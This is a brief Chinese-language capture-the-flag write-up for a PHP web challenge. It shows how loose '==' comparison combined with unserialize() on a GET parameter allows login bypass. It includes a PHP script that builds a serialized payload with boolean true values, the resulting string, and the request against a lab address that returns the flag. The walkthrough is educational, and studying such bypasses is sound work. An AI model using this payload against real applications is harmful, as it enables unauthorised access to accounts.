flag{who_is_flag_3001}
打开网页如图所示,仔细检查上面的代码,发现是需要通过get info来获取username和password,而其正确的username和password暂未给你。
但是发现代码中对username和password的判断使用==,那么这意味着可以通过bool型来强行使网页判断为true;
发现data_unserialize = unserialize($info);这段代码使用了unserialize函数对输入的信息进行反序列化,那么我们先对像输入的内容进行序列化;
首先构建php文件:
具体内容如下所示:
<?php echo serialize(array( "username"=>true, "password"=>true, )); ?>
接下来再目录下输入cmd进入控制台,输入php test.php
输出序列化内容
a:2:{s:8:"username";b:1;s:8:"password";b:1;}
接下来访问172.17.0.34/?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
(因为从代码中可以看出是对info进行GET)
找到了flag
flag为flag{who_is_flag_3001}